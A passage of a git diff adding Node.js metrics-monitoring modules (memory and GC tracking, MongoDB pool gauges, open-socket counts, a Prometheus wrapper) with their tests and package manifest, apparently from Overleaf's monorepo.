adjusted) +let countSinceLastGc = 0 // how many minutes since last gc +const MemoryChunkSize = 4 // how many megabytes we need to free to consider gc worth doing + +const readyToGc = function () { + // update allowed cpu time + CpuTimeBucket = CpuTimeBucket + CpuTimeBucketRate + CpuTimeBucket = + CpuTimeBucket < CpuTimeBucketMax ? CpuTimeBucket : CpuTimeBucketMax + // update counts since last gc + countSinceLastGc = countSinceLastGc + 1 + // check there is enough time since last gc and we have enough cpu + return countSinceLastGc > gcInterval && CpuTimeBucket > 0 +} + +const executeAndTime = function (fn) { + // time the execution of fn() and subtract from cpu allowance + const t0 = process.hrtime() + fn() + const dt = process.hrtime(t0) + const timeTaken = (dt[0] + dt[1] * 1e-9) * 1e3 // in milliseconds + CpuTimeBucket -= Math.ceil(timeTaken) + return timeTaken +} + +const inMegaBytes = function (obj) { + // convert process.memoryUsage hash {rss,heapTotal,heapFreed} into megabytes + const result = {} + for (const k in obj) { + const v = obj[k] + result[k] = (v / oneMegaByte).toFixed(2) + } + return result +} + +const updateMemoryStats = function (oldMem, newMem) { + countSinceLastGc = 0 + const delta = {} + for (const k in newMem) { + delta[k] = (newMem[k] - oldMem[k]).toFixed(2) + } + // take the max of all memory measures + const savedMemory = Math.max(-delta.rss, -delta.heapTotal, -delta.heapUsed) + delta.megabytesFreed = savedMemory + // did it do any good? 
+ if (savedMemory < MemoryChunkSize) { + gcInterval = gcInterval + 1 // no, so wait longer next time + } else { + gcInterval = Math.max(gcInterval - 1, 1) // yes, wait less time + } + return delta +} + +module.exports = MemoryMonitor = { + monitor(logger) { + const interval = setInterval(() => MemoryMonitor.Check(logger), oneMinute) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + + Check(logger) { + let mem + const Metrics = require('./index') + const memBeforeGc = (mem = inMegaBytes(process.memoryUsage())) + Metrics.gauge('memory.rss', mem.rss) + Metrics.gauge('memory.heaptotal', mem.heapTotal) + Metrics.gauge('memory.heapused', mem.heapUsed) + Metrics.gauge('memory.gc-interval', gcInterval) + // Metrics.gauge("memory.cpu-time-bucket", CpuTimeBucket) + + logger.debug(mem, 'process.memoryUsage()') + + if (global.gc != null && readyToGc()) { + const gcTime = executeAndTime(global.gc).toFixed(2) + const memAfterGc = inMegaBytes(process.memoryUsage()) + const deltaMem = updateMemoryStats(memBeforeGc, memAfterGc) + logger.debug( + { + gcTime, + memBeforeGc, + memAfterGc, + deltaMem, + gcInterval, + CpuTimeBucket, + }, + 'global.gc() forced' + ) + // Metrics.timing("memory.gc-time", gcTime) + Metrics.gauge('memory.gc-rss-freed', -deltaMem.rss) + Metrics.gauge('memory.gc-heaptotal-freed', -deltaMem.heapTotal) + return Metrics.gauge('memory.gc-heapused-freed', -deltaMem.heapUsed) + } + }, +} diff --git a/libraries/metrics/mongodb.js b/libraries/metrics/mongodb.js new file mode 100644 index 0000000..c9f4e0b --- /dev/null +++ b/libraries/metrics/mongodb.js @@ -0,0 +1,84 @@ +const { Gauge, Summary } = require('prom-client') + +function monitor(mongoClient) { + const labelNames = ['mongo_server'] + const poolSize = new Gauge({ + name: 'mongo_connection_pool_size', + help: 'number of connections in the connection pool', + labelNames, + // Use this one metric's collect() to set all metrics' values. + collect, + }) + const availableConnections = new Gauge({ + name: 'mongo_connection_pool_available', + help: 'number of connections that are not busy', + labelNames, + }) + const waitQueueSize = new Gauge({ + name: 'mongo_connection_pool_waiting', + help: 'number of operations waiting for an available connection', + labelNames, + }) + const maxPoolSize = new Gauge({ + name: 'mongo_connection_pool_max', + help: 'max size for the connection pool', + labelNames, + }) + + const mongoCommandTimer = new Summary({ + name: 'mongo_command_time', + help: 'time taken to complete a mongo command', + percentiles: [], + labelNames: ['status', 'method'], + }) + + if (mongoClient.on) { + mongoClient.on('commandSucceeded', event => { + mongoCommandTimer.observe( + { + status: 'success', + method: event.commandName === 'find' ? 'read' : 'write', + }, + event.duration + ) + }) + + mongoClient.on('commandFailed', event => { + mongoCommandTimer.observe( + { + status: 'failed', + method: event.commandName === 'find' ? 'read' : 'write', + }, + event.duration + ) + }) + } + + function collect() { + // Reset all gauges in case they contain values for servers that + // disappeared + poolSize.reset() + availableConnections.reset() + waitQueueSize.reset() + maxPoolSize.reset() + + const servers = mongoClient.topology?.s?.servers + if (servers != null) { + for (const [address, server] of servers) { + // The server object is different between v4 and v5 (c.f. 
https://github.com/mongodb/node-mongodb-native/pull/3645)
+        const pool = server.s?.pool || server.pool
+        if (pool == null) {
+          continue
+        }
+
+        const labels = { mongo_server: address }
+        poolSize.set(labels, pool.totalConnectionCount)
+        availableConnections.set(labels, pool.availableConnectionCount)
+        waitQueueSize.set(labels, pool.waitQueueSize)
+        maxPoolSize.set(labels, pool.options.maxPoolSize)
+      }
+    }
+  }
+}
+
+module.exports = { monitor }
diff --git a/libraries/metrics/open_sockets.js b/libraries/metrics/open_sockets.js
new file mode 100644
index 0000000..da7241d
--- /dev/null
+++ b/libraries/metrics/open_sockets.js
@@ -0,0 +1,99 @@
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS205: Consider reworking code to avoid use of IIFEs
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let OpenSocketsMonitor
+const seconds = 1000
+
+// In Node 0.10 the default is 5, which means only 5 open connections at once.
+// Node 0.12 has a default of Infinity. Make sure we have no limit set,
+// regardless of Node version.
+require('node:http').globalAgent.maxSockets = Infinity
+require('node:https').globalAgent.maxSockets = Infinity
+
+const SOCKETS_HTTP = require('node:http').globalAgent.sockets
+const SOCKETS_HTTPS = require('node:https').globalAgent.sockets
+const FREE_SOCKETS_HTTP = require('node:http').globalAgent.freeSockets
+const FREE_SOCKETS_HTTPS = require('node:https').globalAgent.freeSockets
+
+// keep track of set gauges and reset them in the next collection cycle
+const SEEN_HOSTS_HTTP = new Set()
+const SEEN_HOSTS_HTTPS = new Set()
+const FREE_SEEN_HOSTS_HTTP = new Set()
+const FREE_SEEN_HOSTS_HTTPS = new Set()
+
+function collectConnectionsCount(
+  sockets,
+  seenHosts,
+  status,
+  https,
+  emitLegacyMetric
+) {
+  const Metrics = require('./index')
+  Object.keys(sockets).forEach(host => seenHosts.add(host))
+  seenHosts.forEach(host => {
+    // host: 'HOST:PORT:'
+    const hostname = host.split(':')[0]
+    const openConnections = (sockets[host] || []).length
+    if (!openConnections) {
+      seenHosts.delete(host)
+    }
+    Metrics.gauge('sockets', openConnections, 1, {
+      path: hostname,
+      method: https,
+      status,
+    })
+    if (status === 'open' && emitLegacyMetric) {
+      // Emit legacy metric to keep old time series intact.
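+      // The legacy name interpolates status, protocol and host, e.g.
+      // 'open_connections.http.somehost' (dots are escaped to underscores
+      // by the metrics layer, as the acceptance tests expect).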
+ Metrics.gauge( + `${status}_connections.${https}.${hostname}`, + openConnections + ) + } + }) +} + +module.exports = OpenSocketsMonitor = { + monitor(emitLegacyMetric) { + const interval = setInterval( + () => OpenSocketsMonitor.gaugeOpenSockets(emitLegacyMetric), + 5 * seconds + ) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + + gaugeOpenSockets(emitLegacyMetric) { + collectConnectionsCount( + SOCKETS_HTTP, + SEEN_HOSTS_HTTP, + 'open', + 'http', + emitLegacyMetric + ) + collectConnectionsCount( + SOCKETS_HTTPS, + SEEN_HOSTS_HTTPS, + 'open', + 'https', + emitLegacyMetric + ) + collectConnectionsCount( + FREE_SOCKETS_HTTP, + FREE_SEEN_HOSTS_HTTP, + 'free', + 'http', + false + ) + collectConnectionsCount( + FREE_SOCKETS_HTTPS, + FREE_SEEN_HOSTS_HTTPS, + 'free', + 'https', + false + ) + }, +} diff --git a/libraries/metrics/package.json b/libraries/metrics/package.json new file mode 100644 index 0000000..384e58c --- /dev/null +++ b/libraries/metrics/package.json @@ -0,0 +1,45 @@ +{ + "name": "@overleaf/metrics", + "version": "4.2.0", + "description": "A drop-in metrics and monitoring module for node.js apps", + "repository": { + "type": "git", + "url": "https://github.com/overleaf/metrics-module.git" + }, + "main": "index.js", + "dependencies": { + "@google-cloud/opentelemetry-cloud-trace-exporter": "^2.1.0", + "@google-cloud/profiler": "^6.0.0", + "@opentelemetry/api": "^1.4.1", + "@opentelemetry/auto-instrumentations-node": "^0.39.1", + "@opentelemetry/exporter-trace-otlp-http": "^0.41.2", + "@opentelemetry/resources": "^1.15.2", + "@opentelemetry/sdk-node": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.15.2", + "compression": "^1.7.4", + "prom-client": "^14.1.1", + "yn": "^3.1.1" + }, + "devDependencies": { + "bunyan": "^1.0.0", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "test:acceptance": "mocha --reporter spec --recursive --exit --grep=$MOCHA_GREP test/acceptance", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "peerDependencies": { + "@overleaf/logger": "*" + } +} diff --git a/libraries/metrics/prom_wrapper.js b/libraries/metrics/prom_wrapper.js new file mode 100644 index 0000000..88f8374 --- /dev/null +++ b/libraries/metrics/prom_wrapper.js @@ -0,0 +1,177 @@ +const logger = require('@overleaf/logger') +const prom = require('prom-client') +const registry = require('prom-client').register +const metrics = new Map() + +const labelsKey = function (labels) { + let keys = Object.keys(labels) + if (keys.length === 0) { + return '' + } + + keys = keys.sort() + + let hash = '' + for (const key of keys) { + if (hash.length) { + hash += ',' + } + hash += `${key}:${labels[key]}` + } + + return hash +} + +const labelsAsArgs = function (labels, labelNames) { + const args = [] + for (const label of labelNames) { + args.push(labels[label] || '') + } + return args +} + +const PromWrapper = { + ttlInMinutes: 0, + registry, + + metric(type, name, labels, buckets) { + return metrics.get(name) || new 
MetricWrapper(type, name, labels, buckets) + }, + + collectDefaultMetrics: prom.collectDefaultMetrics, +} + +class MetricWrapper { + constructor(type, name, labels, buckets) { + metrics.set(name, this) + this.name = name + this.instances = new Map() + this.lastAccess = new Date() + + const labelNames = labels ? Object.keys(labels) : [] + switch (type) { + case 'counter': + this.metric = new prom.Counter({ + name, + help: name, + labelNames, + }) + break + case 'histogram': + this.metric = new prom.Histogram({ + name, + help: name, + labelNames, + buckets, + }) + break + case 'summary': + this.metric = new prom.Summary({ + name, + help: name, + maxAgeSeconds: 60, + ageBuckets: 10, + labelNames, + }) + break + case 'gauge': + this.metric = new prom.Gauge({ + name, + help: name, + labelNames, + }) + break + default: + throw new Error(`Unknown metric type: ${type}`) + } + } + + inc(labels, value) { + this._execMethod('inc', labels, value) + } + + observe(labels, value) { + this._execMethod('observe', labels, value) + } + + set(labels, value) { + this._execMethod('set', labels, value) + } + + sweep() { + const thresh = new Date(Date.now() - 1000 * 60 * PromWrapper.ttlInMinutes) + this.instances.forEach((instance, key) => { + if (thresh > instance.time) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log( + 'Sweeping stale metric instance', + this.name, + { labels: instance.labels }, + key + ) + } + this.metric.remove( + ...labelsAsArgs(instance.labels, this.metric.labelNames) + ) + } + }) + + if (thresh > this.lastAccess) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Sweeping stale metric', this.name, thresh, this.lastAccess) + } + metrics.delete(this.name) + registry.removeSingleMetric(this.name) + } + } + + _execMethod(method, labels, value) { + const key = labelsKey(labels) + if (key !== '') { + this.instances.set(key, { time: new Date(), labels }) + } + this.lastAccess = new Date() + try { + this.metric[method](labels, value) + } catch (err) { + logger.warn( + { err, metric: this.metric.name, labels }, + 'failed to record metric' + ) + } + } +} + +let sweepingInterval +PromWrapper.setupSweeping = function () { + if (sweepingInterval) { + clearInterval(sweepingInterval) + } + if (!PromWrapper.ttlInMinutes) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Not registering sweep method -- empty ttl') + } + return + } + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Registering sweep method') + } + sweepingInterval = setInterval(function () { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Sweeping metrics') + } + metrics.forEach((metric, key) => { + metric.sweep() + }) + }, 60000) + + const Metrics = require('./index') + Metrics.registerDestructor(() => clearInterval(sweepingInterval)) +} + +module.exports = PromWrapper diff --git a/libraries/metrics/test/acceptance/metrics_tests.js b/libraries/metrics/test/acceptance/metrics_tests.js new file mode 100644 index 0000000..88f6138 --- /dev/null +++ b/libraries/metrics/test/acceptance/metrics_tests.js @@ -0,0 +1,343 @@ +const { promisify } = require('node:util') +const os = require('node:os') +const http = require('node:http') +const { expect } = require('chai') +const Metrics = require('../..') + +const HOSTNAME = os.hostname() +const APP_NAME = 'test-app' +const sleep = promisify(setTimeout) + +describe('Metrics module', function () { 
+ before(function () { + process.env.METRICS_APP_NAME = 'test-app' + require('../../initialize') + }) + + describe('at startup', function () { + it('increments the process_startup counter', async function () { + await expectMetricValue('process_startup', 1) + }) + + it('collects default metrics', async function () { + const metric = await getMetric('process_cpu_user_seconds_total') + expect(metric).to.exist + }) + }) + + describe('inc()', function () { + it('increments counts by 1', async function () { + Metrics.inc('duck_count') + await expectMetricValue('duck_count', 1) + Metrics.inc('duck_count') + Metrics.inc('duck_count') + await expectMetricValue('duck_count', 3) + }) + + it('escapes special characters in the key', async function () { + Metrics.inc('show.me the $!!') + await expectMetricValue('show_me_the____', 1) + }) + }) + + describe('count()', function () { + it('increments counts by the given count', async function () { + Metrics.count('rabbit_count', 5) + await expectMetricValue('rabbit_count', 5) + Metrics.count('rabbit_count', 6) + Metrics.count('rabbit_count', 7) + await expectMetricValue('rabbit_count', 18) + }) + }) + + describe('summary()', function () { + it('collects observations', async function () { + Metrics.summary('oven_temp', 200) + Metrics.summary('oven_temp', 300) + Metrics.summary('oven_temp', 450) + const sum = await getSummarySum('oven_temp') + expect(sum).to.equal(950) + }) + }) + + describe('timing()', function () { + it('collects timings', async function () { + Metrics.timing('sprint_100m', 10) + Metrics.timing('sprint_100m', 20) + Metrics.timing('sprint_100m', 30) + const sum = await getSummarySum('timer_sprint_100m') + expect(sum).to.equal(60) + }) + }) + + describe('histogram()', function () { + it('collects in buckets', async function () { + const buckets = [10, 100, 1000] + Metrics.histogram('distance', 10, buckets) + Metrics.histogram('distance', 20, buckets) + Metrics.histogram('distance', 100, buckets) + Metrics.histogram('distance', 200, buckets) + Metrics.histogram('distance', 1000, buckets) + Metrics.histogram('distance', 2000, buckets) + const sum = await getSummarySum('histogram_distance') + expect(sum).to.equal(3330) + await checkHistogramValues('histogram_distance', { + 10: 1, + 100: 3, + 1000: 5, + '+Inf': 6, + }) + }) + }) + + describe('Timer', function () { + beforeEach('collect timings', async function () { + const buckets = [10, 100, 1000] + for (const duration of [1, 1, 1, 15, 15, 15, 105, 105, 105]) { + const withBuckets = new Metrics.Timer( + 'height', + 1, + { label_1: 'a' }, + buckets + ) + const withOutBuckets = new Metrics.Timer('depth', 1, { label_2: 'b' }) + await sleep(duration) + withBuckets.done() + withOutBuckets.done({ label_3: 'c' }) + } + }) + + it('with buckets', async function () { + await checkHistogramValues('histogram_height', { + 10: 3, + 100: 6, + 1000: 9, + '+Inf': 9, + }) + const labelNames = await getMetric('histogram_height').labelNames + expect(labelNames).to.deep.equal(['label_1']) + }) + + it('without buckets', async function () { + await checkSummaryValues('timer_depth', { + 0.01: 1, + 0.05: 1, + 0.5: 15, + 0.9: 105, + 0.95: 105, + 0.99: 105, + 0.999: 105, + }) + const labelNames = await getMetric('timer_depth').labelNames + expect(labelNames).to.deep.equal(['label_2', 'label_3']) + }) + }) + + describe('gauge()', function () { + it('records values', async function () { + Metrics.gauge('water_level', 1.5) + await expectMetricValue('water_level', 1.5) + Metrics.gauge('water_level', 4.2) + await 
expectMetricValue('water_level', 4.2) + }) + }) + + describe('globalGauge()', function () { + it('records values without a host label', async function () { + Metrics.globalGauge('tire_pressure', 99.99) + const { value, labels } = await getMetricValue('tire_pressure') + expect(value).to.equal(99.99) + expect(labels.host).to.equal('global') + expect(labels.app).to.equal(APP_NAME) + }) + }) + + describe('open_sockets', function () { + const keyServer1 = 'open_connections_http_127_42_42_1' + const keyServer2 = 'open_connections_http_127_42_42_2' + + let finish1, finish2, emitResponse1, emitResponse2 + function resetEmitResponse1() { + emitResponse1 = new Promise(resolve => (finish1 = resolve)) + } + resetEmitResponse1() + function resetEmitResponse2() { + emitResponse2 = new Promise(resolve => (finish2 = resolve)) + } + resetEmitResponse2() + + let server1, server2 + before(function setupServer1(done) { + server1 = http.createServer((req, res) => { + res.write('...') + emitResponse1.then(() => res.end()) + }) + server1.listen(0, '127.42.42.1', done) + }) + before(function setupServer2(done) { + server2 = http.createServer((req, res) => { + res.write('...') + emitResponse2.then(() => res.end()) + }) + server2.listen(0, '127.42.42.2', done) + }) + after(function cleanupPendingRequests() { + finish1() + finish2() + }) + after(function shutdownServer1(done) { + if (server1) server1.close(done) + }) + after(function shutdownServer2(done) { + if (server2) server2.close(done) + }) + + let urlServer1, urlServer2 + before(function setUrls() { + urlServer1 = `http://127.42.42.1:${server1.address().port}/` + urlServer2 = `http://127.42.42.2:${server2.address().port}/` + }) + describe('gaugeOpenSockets()', function () { + beforeEach(function runGaugeOpenSockets() { + Metrics.open_sockets.gaugeOpenSockets(true) + }) + + describe('without pending connections', function () { + it('emits no open_connections', async function () { + await expectNoMetricValue(keyServer1) + await expectNoMetricValue(keyServer2) + }) + }) + + describe('with pending connections for server1', function () { + before(function (done) { + http.get(urlServer1) + http.get(urlServer1) + setTimeout(done, 10) + }) + + it('emits 2 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 2) + }) + + it('emits no open_connections for server2', async function () { + await expectNoMetricValue(keyServer2) + }) + }) + + describe('with pending connections for server1 and server2', function () { + before(function (done) { + http.get(urlServer2) + http.get(urlServer2) + setTimeout(done, 10) + }) + + it('emits 2 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 2) + }) + + it('emits 2 open_connections for server2', async function () { + await expectMetricValue(keyServer2, 2) + }) + }) + + describe('when requests finish for server1', function () { + before(function (done) { + finish1() + resetEmitResponse1() + http.get(urlServer1) + + setTimeout(done, 10) + }) + + it('emits 1 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 1) + }) + + it('emits 2 open_connections for server2', async function () { + await expectMetricValue(keyServer2, 2) + }) + }) + + describe('when all requests complete', function () { + before(function (done) { + finish1() + finish2() + + setTimeout(done, 10) + }) + + it('emits no open_connections', async function () { + await expectNoMetricValue(keyServer1) + await expectNoMetricValue(keyServer2) + }) + }) + }) + }) +}) + 
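+// Helpers used by the tests above to read metric values back out of the
+// prom-client registry.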
+function getMetric(key) { + return Metrics.register.getSingleMetric(key) +} + +async function getSummarySum(key) { + const metric = getMetric(key) + const item = await metric.get() + for (const value of item.values) { + if (value.metricName === `${key}_sum`) { + return value.value + } + } + return null +} + +async function checkHistogramValues(key, values) { + const metric = getMetric(key) + const item = await metric.get() + const found = {} + for (const value of item.values) { + const bucket = value.labels.le + if (!bucket) continue + found[bucket] = value.value + } + expect(found).to.deep.equal(values) + return null +} + +async function checkSummaryValues(key, values) { + const metric = getMetric(key) + const item = await metric.get() + const found = {} + for (const value of item.values) { + const quantile = value.labels.quantile + if (!quantile) continue + found[quantile] = value.value + } + for (const quantile of Object.keys(values)) { + expect(found[quantile]).to.be.within( + values[quantile] - 5, + values[quantile] + 15, + `quantile: ${quantile}` + ) + } + return null +} + +async function getMetricValue(key) { + const metrics = await Metrics.register.getMetricsAsJSON() + const metric = metrics.find(m => m.name === key) + return metric.values[0] +} + +async function expectMetricValue(key, expectedValue) { + const value = await getMetricValue(key) + expect(value.value).to.equal(expectedValue) + expect(value.labels.host).to.equal(HOSTNAME) + expect(value.labels.app).to.equal(APP_NAME) +} + +async function expectNoMetricValue(key) { + const metric = getMetric(key) + if (!metric) return + await expectMetricValue(key, 0) +} diff --git a/libraries/metrics/test/unit/js/event_loop.js b/libraries/metrics/test/unit/js/event_loop.js new file mode 100644 index 0000000..97b9fdd --- /dev/null +++ b/libraries/metrics/test/unit/js/event_loop.js @@ -0,0 +1,44 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const chai = require('chai') +const { expect } = chai +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../event_loop.js') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') + +describe('event_loop', function () { + before(function () { + this.metrics = { + timing: sinon.stub(), + registerDestructor: sinon.stub(), + } + this.logger = { + warn: sinon.stub(), + } + return (this.event_loop = SandboxedModule.require(modulePath, { + requires: { + './index': this.metrics, + }, + })) + }) + + describe('with a logger provided', function () { + before(function () { + return this.event_loop.monitor(this.logger) + }) + + return it('should register a destructor with metrics', function () { + return expect(this.metrics.registerDestructor.called).to.equal(true) + }) + }) + + return describe('without a logger provided', function () { + return it('should throw an exception', function () { + return expect(this.event_loop.monitor).to.throw('logger is undefined') + }) + }) +}) diff --git a/libraries/metrics/test/unit/js/http.js b/libraries/metrics/test/unit/js/http.js new file mode 100644 index 0000000..7b6bb30 --- /dev/null +++ b/libraries/metrics/test/unit/js/http.js @@ -0,0 +1,171 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') + +const MODULE_PATH = Path.join(__dirname, '../../../http.js') + +describe('http.monitor', 
function () { + beforeEach(function () { + this.req = { + method: 'POST', + url: '/project/1234/cleanup', + headers: { + 'content-length': '123', + }, + route: { + path: '/project/:id/cleanup', + }, + } + this.originalResponseEnd = sinon.stub() + this.res = { + end: this.originalResponseEnd, + } + this.data = 'data' + this.logger = { + debug: sinon.stub(), + info: sinon.stub(), + warn: sinon.stub(), + } + this.Metrics = { + timing: sinon.stub(), + summary: sinon.stub(), + } + this.clock = sinon.useFakeTimers() + + this.http = SandboxedModule.require(MODULE_PATH, { + requires: { + './index': this.Metrics, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('with the default options', function () { + beforeEach('set up the monitor', function (done) { + this.http.monitor(this.logger)(this.req, this.res, done) + }) + + describe('after a simple request', function () { + endRequest() + expectOriginalEndCalled() + expectMetrics() + + it('logs the request at the DEBUG level', function () { + sinon.assert.calledWith( + this.logger.debug, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + + describe('when logging is disabled', function () { + beforeEach('disable logging', function () { + this.req.logger.disable() + }) + + endRequest() + expectOriginalEndCalled() + expectMetrics() + + it("doesn't log the request", function () { + sinon.assert.notCalled(this.logger.debug) + }) + }) + + describe('with custom log fields', function () { + beforeEach('add custom fields', function () { + this.req.logger.addFields({ a: 1, b: 2 }) + }) + + endRequest() + + it('logs the request with the custom log fields', function () { + sinon.assert.calledWith( + this.logger.debug, + { req: this.req, res: this.res, responseTimeMs: 500, a: 1, b: 2 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + + describe('when setting the log level', function () { + beforeEach('set custom level', function () { + this.req.logger.setLevel('warn') + }) + + endRequest() + + it('logs the request at the custom level', function () { + sinon.assert.calledWith( + this.logger.warn, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + }) + + describe('with a different default log level', function () { + beforeEach('set up the monitor', function (done) { + this.http.monitor(this.logger, 'info')(this.req, this.res, done) + }) + + endRequest() + + it('logs the request at that level', function () { + sinon.assert.calledWith( + this.logger.info, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) +}) + +function endRequest() { + beforeEach('end the request', function () { + this.clock.tick(500) + this.res.end(this.data) + }) +} + +function expectOriginalEndCalled() { + it('calls the original res.end()', function () { + sinon.assert.calledWith(this.originalResponseEnd, this.data) + }) +} + +function expectMetrics() { + it('records the response time', function () { + sinon.assert.calledWith(this.Metrics.timing, 'http_request', 500, null, { + method: this.req.method, + status_code: this.res.status_code, + path: 'project_id_cleanup', + }) + }) + + it('records the request size', function () { + sinon.assert.calledWith( + this.Metrics.summary, + 'http_request_size_bytes', + 123, + { + method: this.req.method, + status_code: this.res.status_code, + path: 'project_id_cleanup', + } + ) + }) +} diff --git 
a/libraries/metrics/test/unit/js/mongodb.js b/libraries/metrics/test/unit/js/mongodb.js new file mode 100644 index 0000000..f74ece4 --- /dev/null +++ b/libraries/metrics/test/unit/js/mongodb.js @@ -0,0 +1,89 @@ +const Metrics = require('../../..') + +const { expect } = require('chai') +const prom = require('prom-client') + +describe('mongodb', function () { + beforeEach(function () { + prom.register.clear() + this.pool = { + totalConnectionCount: 8, + availableConnectionCount: 2, + waitQueueSize: 4, + options: { maxPoolSize: 10 }, + } + this.servers = new Map([['server1', { s: { pool: this.pool } }]]) + + this.mongoClient = { topology: { s: { servers: this.servers } } } + }) + + it('handles an unconnected client', async function () { + const mongoClient = {} + Metrics.mongodb.monitor(mongoClient) + const metrics = await getMetrics() + expect(metrics).to.deep.equal({}) + }) + + it('collects Mongo metrics', async function () { + Metrics.mongodb.monitor(this.mongoClient) + const metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + }) + }) + + it('handles topology changes', async function () { + Metrics.mongodb.monitor(this.mongoClient) + let metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + }) + + // Add a server + this.servers.set('server2', this.servers.get('server1')) + metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + 'mongo_connection_pool_max:server2': 10, + 'mongo_connection_pool_size:server2': 8, + 'mongo_connection_pool_available:server2': 2, + 'mongo_connection_pool_waiting:server2': 4, + }) + + // Delete a server + this.servers.delete('server1') + metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server2': 10, + 'mongo_connection_pool_size:server2': 8, + 'mongo_connection_pool_available:server2': 2, + 'mongo_connection_pool_waiting:server2': 4, + }) + + // Delete another server + this.servers.delete('server2') + metrics = await getMetrics() + expect(metrics).to.deep.equal({}) + }) +}) + +async function getMetrics() { + const metrics = await prom.register.getMetricsAsJSON() + const result = {} + for (const metric of metrics) { + for (const value of metric.values) { + const key = `${metric.name}:${value.labels.mongo_server}` + result[key] = value.value + } + } + return result +} diff --git a/libraries/metrics/tsconfig.json b/libraries/metrics/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/metrics/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/metrics/uv_threadpool_size.js b/libraries/metrics/uv_threadpool_size.js new file mode 100644 index 0000000..78a9431 --- /dev/null +++ b/libraries/metrics/uv_threadpool_size.js @@ -0,0 +1,5 @@ +if (!process.env.UV_THREADPOOL_SIZE) { + process.env.UV_THREADPOOL_SIZE = 16 + // eslint-disable-next-line no-console + console.log(`Set UV_THREADPOOL_SIZE=${process.env.UV_THREADPOOL_SIZE}`) +} diff 
--git a/libraries/mongo-utils/.gitignore b/libraries/mongo-utils/.gitignore
new file mode 100644
index 0000000..edb0f85
--- /dev/null
+++ b/libraries/mongo-utils/.gitignore
@@ -0,0 +1,3 @@
+
+# managed by monorepo$ bin/update_build_scripts
+.npmrc
diff --git a/libraries/mongo-utils/.nvmrc b/libraries/mongo-utils/.nvmrc
new file mode 100644
index 0000000..0254b1e
--- /dev/null
+++ b/libraries/mongo-utils/.nvmrc
@@ -0,0 +1 @@
+20.18.2
diff --git a/libraries/mongo-utils/batchedUpdate.js b/libraries/mongo-utils/batchedUpdate.js
new file mode 100644
index 0000000..7e3ad67
--- /dev/null
+++ b/libraries/mongo-utils/batchedUpdate.js
@@ -0,0 +1,317 @@
+// @ts-check
+/* eslint-disable no-console */
+const { ObjectId, ReadPreference } = require('mongodb')
+
+const READ_PREFERENCE_SECONDARY =
+  process.env.MONGO_HAS_SECONDARIES === 'true'
+    ? ReadPreference.secondary.mode
+    : ReadPreference.secondaryPreferred.mode
+
+const ONE_MONTH_IN_MS = 1000 * 60 * 60 * 24 * 31
+let ID_EDGE_PAST
+const ID_EDGE_FUTURE = objectIdFromMs(Date.now() + 1000)
+let BATCH_DESCENDING
+let BATCH_SIZE
+let VERBOSE_LOGGING
+let BATCH_RANGE_START
+let BATCH_RANGE_END
+let BATCH_MAX_TIME_SPAN_IN_MS
+let BATCHED_UPDATE_RUNNING = false
+
+/**
+ * @typedef {import("mongodb").Collection} Collection
+ * @typedef {import("mongodb-legacy").Collection} LegacyCollection
+ * @typedef {import("mongodb").Document} Document
+ * @typedef {import("mongodb").FindOptions} FindOptions
+ * @typedef {import("mongodb").UpdateFilter<Document>} UpdateDocument
+ */
+
+/**
+ * @typedef {Object} BatchedUpdateOptions
